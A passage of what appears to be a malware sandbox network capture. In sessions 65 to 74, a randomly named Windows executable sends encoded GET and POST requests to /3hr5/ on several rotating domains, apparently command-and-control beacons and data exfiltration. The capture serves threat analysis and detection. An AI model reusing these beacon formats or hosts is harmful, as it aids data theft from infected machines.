                                                                                                                              Dec 4, 2023 15:26:55.721295118 CET    1340    OUT
                                                                                                                              Dec 4, 2023 15:26:55.721467018 CET    1340    OUT


                                                                                                                              Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                              65    192.168.11.20    50196    37.97.254.27    80    8076    C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp    Bytes transferred    Direction    Data
                                                                                                                              Dec 4, 2023 15:26:58.246385098 CET    528    OUT    GET /3hr5/?TZd=WvKXMpNdKcx12PohJdQ2Nu7zrY//6AeCNDisJJSnngoH0SI3JFeqPH7/T9Xi9rN0AVbH68W87D80yQtOqBVkzxSvcNI04lJ+LQ==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:26:58.425792933 CET    1340    IN    HTTP/1.1 200 OK
                                                                                                                              Date: Fri, 28 Apr 2023 12:26:41 GMT
                                                                                                                              Server: Apache
                                                                                                                              Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Type: text/html
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              X-Varnish: 1067625590 3
                                                                                                                              Age: 19015217
                                                                                                                              Via: 1.1 varnish (Varnish/6.1)
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 64668
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">
                                                                                                                              Dec 4, 2023 15:26:58.425908089 CET    1340    IN
                                                                                                                              Dec 4, 2023 15:26:58.425975084 CET    1340    IN
                                                                                                                              Dec 4, 2023 15:26:58.426069021 CET    1340    IN
                                                                                                                              Dec 4, 2023 15:26:58.426162958 CET    1340    IN
                                                                                                                              Dec 4, 2023 15:26:58.426291943 CET    1340    IN
                                                                                                                              Dec 4, 2023 15:26:58.426373005 CET    1340    IN
                                                                                                                              Dec 4, 2023 15:26:58.426434040 CET    1340    IN
                                                                                                                              Dec 4, 2023 15:26:58.426517963 CET    1340    IN
                                                                                                                              Dec 4, 2023 15:26:58.426577091 CET    1340    IN
                                                                                                                              Dec 4, 2023 15:26:58.604487896 CET    1340    IN


                                                                                                                              Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                              66    192.168.11.20    50197    108.179.192.34    80    8076    C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp    Bytes transferred    Direction    Data
                                                                                                                              Dec 4, 2023 15:27:03.918009043 CET    831    OUT    POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.metodomestredojogo.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.metodomestredojogo.com
                                                                                                                              Referer: http://www.metodomestredojogo.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:27:04.168114901 CET    1340    IN    HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:03 GMT
                                                                                                                              Server: Apache
                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                              Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 6505
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Dec 4, 2023 15:27:04.168199062 CET1340INData Raw: d4 e7 0f f6 26 e9 6e e0 77 92 f7 22 ed 3b 91 de 9d 08 3c dc 07 a1 9b a7 e5 0a 20 93 97 6c bd 83 9d 49 2d 67 98 86 3b f4 26 eb 4d 6c 5e db 3b af 9b 59 0e 15 4e 0e 16 36 6f 56 e8 e1 d6 31 d3 b5 63 66 54 11 35 76 0a 81 65 4c 40 ec 3c 1f 9b 65 0e 72
                                                                                                                              Data Ascii: &nw";< lI-g;&Ml^;YN6oV1cfT5veL@<erJ!rBH>%LhCETRNuN^1kp2iXyWRXC;vZs;~/0/GfKyC9;FNzS; v Urlt< )5Z44hP
                                                                                                                              Dec 4, 2023 15:27:04.168237925 CET1340INData Raw: 45 93 94 a1 d0 eb 74 3a 9b d8 e9 54 0a e3 6a f6 07 8c 42 2f 6c f7 20 bb d9 b2 b6 93 5d 5c 54 dc af 77 d6 bf 26 b9 33 48 1d 95 dd cd 6f 95 4d b8 9c a0 d3 ea 24 9d c8 78 79 ed ba 88 ef e6 0a 34 18 b7 52 c5 45 3e 88 3e 22 df 04 e5 e7 b4 36 27 5a 52
                                                                                                                              Data Ascii: Et:TjB/l ]\Tw&3HoM$xy4RE>>"6'ZR(t:N}<e0gZ~srqg6o0>of,vM<^eW(H*CclD%,Ij JU0}0I> {DYm!}wIsz2?#6fZME#b
                                                                                                                              Dec 4, 2023 15:27:04.168275118 CET1340INData Raw: 0f dc 03 50 76 a8 e9 bc 9e 83 e9 14 57 40 97 4f 02 d9 6f 56 83 37 4f 99 81 27 81 94 1d 0e 79 24 67 e2 69 3a 6d ba 1c dc ab 82 f8 49 08 9b 2e 35 08 bc c8 98 90 c5 1a 4a 2a 2a 92 a7 a9 55 db f1 61 64 9a 4d 40 7d 49 e0 b2 61 1d 2e 4b 52 83 66 01 10
                                                                                                                              Data Ascii: PvW@OoV7O'y$gi:mI.5J**UadM@}Ia.KRf+<s~!f\Yil_lAP9PUVDjsqYYq=)..?~y|Vr&>OMm*?3/2&dT0"&X4Xsqr
                                                                                                                              Dec 4, 2023 15:27:04.168311119 CET1340INData Raw: 43 bb b6 c8 84 cb e8 ea 02 ed 8e 34 d6 4d d7 9d 6c 57 96 d1 04 d6 dd 6e f1 39 25 98 6c 30 8a 6c 2d 62 ae b0 e3 05 8e 9c ca d8 85 85 01 85 98 2d 92 48 99 70 b8 98 e2 d0 2e 08 3a e1 10 b7 88 bd 5d c4 4c e7 9c 2e 5d 3d a7 b9 73 7e f4 ec d9 b3 5d c1
                                                                                                                              Data Ascii: C4MlWn9%l0l-b-Hp.:]L.]=s~]L-*}k7_v0vC?R2!vmr8Dzj_:<i/*oE_0XEe,*~`~vbS1Nd$GPJn%mu#Vhp7)-\
                                                                                                                              Dec 4, 2023 15:27:04.168340921 CET530INData Raw: 18 b4 36 65 22 b1 41 aa 14 24 54 c4 d2 f3 3c e7 a6 55 8e 74 81 53 08 cd a9 81 0b 83 23 d9 e6 0a 7e 2f 70 9d f1 2a e0 7c 2c 82 00 4e 48 91 91 88 66 b9 24 72 82 56 a0 c6 86 a7 1d c5 a4 e5 25 66 28 c0 a6 e2 47 31 2b 8b 42 8c d9 e7 09 e3 1c 39 ac 9f
                                                                                                                              Data Ascii: 6e"A$T<UtS#~/p*|,NHf$rV%f(G1+B9P>k1+{Nl_DkyNAe*0l\ mfPxYPmC8D%F38M{[HCcR%aAB:SZpsq+V1(3t*'/*S{;U^)


                                                                                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                              67  192.168.11.20  50198  108.179.192.34  80  8076  C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                                                              Dec 4, 2023 15:27:06.558710098 CET  1171  OUT  POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.metodomestredojogo.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.metodomestredojogo.com
                                                                                                                              Referer: http://www.metodomestredojogo.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:27:06.802052021 CET  1340  IN  HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:06 GMT
                                                                                                                              Server: Apache
                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                              Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 6505
                                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                              68  192.168.11.20  50199  108.179.192.34  80  8076  C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                                                              Dec 4, 2023 15:27:09.199676991 CET  6484  OUT  POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.metodomestredojogo.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.metodomestredojogo.com
                                                                                                                              Referer: http://www.metodomestredojogo.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:27:09.686672926 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:09 GMT
                                                                                                                              Server: Apache
                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                              Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 6505
                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.11.20 | 50200 | 108.179.192.34 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:27:11.838695049 CET | 540 | OUT | GET /3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.metodomestredojogo.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:27:12.063363075 CET | 529 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:11 GMT
                                                                                                                              Server: Apache
                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                              X-Redirect-By: WordPress
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Location: http://metodomestredojogo.com/3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD38
                                                                                                                              Content-Length: 0
                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.11.20 | 50201 | 198.177.123.106 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:27:17.252863884 CET | 819 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.echolinkevolve.xyz
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.echolinkevolve.xyz
                                                                                                                              Referer: http://www.echolinkevolve.xyz/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=jAKGx8Xt4B8jobUPvbHPU4+ccbpO8yxTcGBO5WNcOkHwmcAPnfLX9gj9h+xVqmEPumpHwk1tsENZP5IdAaBMwG4d4r2jqOX0WF1qMiYV2vELmy4QQy12JRX9TIt6iOp/jjG+cIIiKOZA8edmRtOuNuuBUqxwfrwuEGyGPZNFQhEf4OBQ7w==
Dec 4, 2023 15:27:17.570305109 CET | 587 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:17 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.11.20 | 50202 | 198.177.123.106 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:27:19.957865000 CET | 1159 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.echolinkevolve.xyz
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.echolinkevolve.xyz
                                                                                                                              Referer: http://www.echolinkevolve.xyz/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:27:20.273545980 CET | 587 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:20 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.11.20 | 50203 | 198.177.123.106 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:27:22.661860943 CET | 12914 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.echolinkevolve.xyz
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.echolinkevolve.xyz
                                                                                                                              Referer: http://www.echolinkevolve.xyz/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
y8gEBxMf/loPLW3EfnLptKqeZbgI3BncpMlf7n0IWEvV4TwKltTomy4li/cqPh9NzcUTZzPsFXAbMklPdity61dvAdUbzYuv7cTff1b4af3MoTeca0g1JNfNBjdCUJVUMQ55oDoJ78ZZO267hOGXsAmcr4d4DntTm2ESVW2n1s3moO3BN/eryiIsR/J2js2uV4+XcWskUPE4lzyXd7G24QUHm8EKZcVi
                                                                                                                              Dec 4, 2023 15:27:22.839776039 CET2626OUTData Raw: 62 78 49 79 39 6f 78 30 62 70 6c 49 5a 37 38 47 33 4c 57 47 4a 4d 72 68 4c 51 75 41 7a 41 52 76 39 54 4d 78 49 54 68 66 6b 30 73 44 2b 67 72 75 76 76 6d 76 51 65 33 75 79 45 2b 77 6a 5a 78 7a 62 76 4e 76 6b 45 4a 4a 77 32 6e 56 48 46 38 52 77 33
                                                                                                                              Data Ascii: bxIy9ox0bplIZ78G3LWGJMrhLQuAzARv9TMxIThfk0sD+gruvvmvQe3uyE+wjZxzbvNvkEJJw2nVHF8Rw32dG3ogWW7zC4o4crDDvQOFQENnHoyoHfs6Hha2VqLFvHn84fsx9Bgm9K2jaleHn4TT0nG4DIAF/E/Qvnet9IjrUGlJGIQvZuf45bJOptrSZohxvNZWIEWYdXmNRBj/SMY0a29nZbw7BrlXwlEbApo7S9LAtmMZxPv
                                                                                                                              Dec 4, 2023 15:27:22.839951038 CET19344OUTData Raw: 56 51 75 64 54 6a 2f 49 49 72 75 75 67 76 6d 4e 36 34 39 64 4d 35 44 47 54 66 37 61 35 2b 55 6d 4a 50 7a 73 30 5a 55 63 58 33 79 6e 37 43 38 4b 67 4b 48 63 59 4d 2f 38 47 6b 4e 45 70 6e 48 71 34 49 6e 75 38 6c 6f 72 6a 38 30 7a 36 76 57 49 4b 6e
                                                                                                                              Data Ascii: VQudTj/IIruugvmN649dM5DGTf7a5+UmJPzs0ZUcX3yn7C8KgKHcYM/8GkNEpnHq4Inu8lorj80z6vWIKnyr+9zfGBPx7xKk0tUKScVAuXF/oemyMCmYrRCxmgv8IKnZKq3TbApXlb8MVOXYl+a7BnSDG/XBhNJS26yCSkgmBbGSAimc23rcnc3cWahl86nibgDgEk3lGBgNu88QNlnxwR6YnjN0kOqCwGdWc73PIrYmbgVqIzR
                                                                                                                              Dec 4, 2023 15:27:22.840095043 CET3912OUTData Raw: 34 31 59 47 50 45 77 6c 46 64 32 4a 5a 59 30 74 53 4b 44 39 77 78 6b 4e 7a 66 62 79 59 5a 44 77 42 44 73 41 31 2b 34 4d 68 38 4a 64 4d 63 38 76 6d 42 2b 61 69 39 52 38 75 57 77 79 6b 4c 55 53 31 41 46 70 75 2f 39 31 78 76 4c 49 73 57 47 64 43 57
                                                                                                                              Data Ascii: 41YGPEwlFd2JZY0tSKD9wxkNzfbyYZDwBDsA1+4Mh8JdMc8vmB+ai9R8uWwykLUS1AFpu/91xvLIsWGdCWEsUbXcryQ2qrxqx3zUiQ1Qk7OTOo8JEHT5Hvh25c3p4agPJD2W2uUvdH6i4wHNcUXvbT+wtYa9eF0ge6gUgad3Lbl1IPGt59c5i2Xbmo0bEV+DKrrbv5W9DwSZRwsQoQj0j/1raGJpPVLmJ6TlrSwxK7EdU6ESbKd
                                                                                                                              Dec 4, 2023 15:27:23.015940905 CET5198OUTData Raw: 64 77 31 57 56 4a 41 76 57 31 35 5a 57 6e 70 58 61 46 43 33 33 31 66 38 38 54 5a 41 56 76 33 70 4d 69 71 75 49 41 77 70 57 48 50 32 2b 4f 4d 34 64 6e 4a 73 34 44 32 55 78 41 6b 7a 6d 6f 32 50 7a 57 4b 56 59 73 65 35 7a 65 6f 77 77 43 4c 67 73 6b
                                                                                                                              Data Ascii: dw1WVJAvW15ZWnpXaFC331f88TZAVv3pMiquIAwpWHP2+OM4dnJs4D2UxAkzmo2PzWKVYse5zeowwCLgsk/Yz+1a6NI9rO+Kbgv7Fk/bKappQELiNtBLv1waP/3jRKLkNXtEe45dVQQRCC3Ft9Zuchx2wWynMmRp42unamCQ7eAW3yqm0g35v5Cj3fm8ovefk1yT0LbtnNUUjVA+sOUr/TF8wcUdopa8JJMPUNnNfqwVoL2HQ7j
                                                                                                                              Dec 4, 2023 15:27:23.016134024 CET5198OUTData Raw: 48 30 57 54 69 4b 75 68 67 2b 56 63 68 75 56 2b 4a 64 4a 78 51 30 37 2b 31 4d 72 47 61 62 59 4d 5a 42 6e 75 2f 68 65 56 33 78 73 4b 56 4d 41 32 52 61 41 69 73 66 4c 43 4a 33 46 36 47 6f 41 6b 49 56 38 38 4e 58 47 4b 34 34 54 4a 64 6a 49 61 37 58
                                                                                                                              Data Ascii: H0WTiKuhg+VchuV+JdJxQ07+1MrGabYMZBnu/heV3xsKVMA2RaAisfLCJ3F6GoAkIV88NXGK44TJdjIa7XdJciiBedMscmNAWDBiZ7daDGT/phThk5SHTT4h6+Uo1A/QQkep2Gzg8QHJ3+RkqAD1MuDyRuDj86aiZvbTk4Fu4uAa1jIwnqUNxSRYz261AornCa3HvZVd1p5giz9W1WWyQKMqsUc7uZz76PFTJImcu58qHZzI71+
                                                                                                                              Dec 4, 2023 15:27:23.016602039 CET2626OUTData Raw: 67 6c 62 55 4c 54 76 69 53 71 38 4b 32 2b 30 48 39 61 6a 2b 64 65 38 51 72 78 6a 41 57 58 52 42 6a 6f 78 50 6d 6f 4d 76 43 64 70 41 56 42 45 56 46 44 70 6a 55 48 43 77 39 41 52 53 45 30 6b 36 45 67 6d 4c 36 70 62 65 46 2f 4e 76 4a 67 4d 57 63 6c
                                                                                                                              Data Ascii: glbULTviSq8K2+0H9aj+de8QrxjAWXRBjoxPmoMvCdpAVBEVFDpjUHCw9ARSE0k6EgmL6pbeF/NvJgMWclfj52yT1IoD8WSm777rvMjAXUfjLrFF2Cak+NDTZDdbD2zj5Ismy+n7O776cNXolBPQBfMK++mrphN3yGvNPUFOAR5oE9I4ZaFsKR7TuJfXYRdHyKbITQtEe7DxbycChQqYlEPaKyB39BM1A6msGBLWaniCHWbCvXU
                                                                                                                              Dec 4, 2023 15:27:23.016760111 CET2116OUTData Raw: 64 6f 6e 32 44 62 4d 75 4c 54 39 64 4b 74 70 65 63 66 4c 7a 36 6d 47 34 44 30 71 5a 41 69 34 70 30 33 78 53 31 2b 77 6a 48 62 37 2f 43 70 4e 56 6a 31 30 4d 30 62 75 62 77 79 6e 54 5a 2b 4f 62 4a 77 51 2b 65 36 66 6c 30 4e 69 4d 30 6c 6c 63 4c 71
                                                                                                                              Data Ascii: don2DbMuLT9dKtpecfLz6mG4D0qZAi4p03xS1+wjHb7/CpNVj10M0bubwynTZ+ObJwQ+e6fl0NiM0llcLqlYwk/5WdONhng0E+lZ5TcH03YzSbD+G/0NPey4wfmy/dXRkrz+VjfpVj1yuZR9fYwId7OfCGpvKU9mKO8E1p0L1Gn4l7mmmMZU73z1rvcoxQ2ARbuczYPs2H6iYFymsrMf/8zO/+PJg/M+S9U6eWEqnJC2FduUCkv
Dec 4, 2023 15:27:23.364418030 CET | 587 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:22 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.11.20 | 50204 | 198.177.123.106 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:27:25.361690044 CET | 536 | OUT | GET /3hr5/?TZd=uCimyMqR3nEPval29bDaQI/GbNlN6Dg0WFpqpEFKdFHS+eYsrsaspyvmyOxFyB19ijhk+19h03NhCcIlFptZsCN8ir2ans2GUg==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.echolinkevolve.xyz
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:27:25.693751097 CET | 602 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:25 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.11.20 | 50205 | 198.252.98.64 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
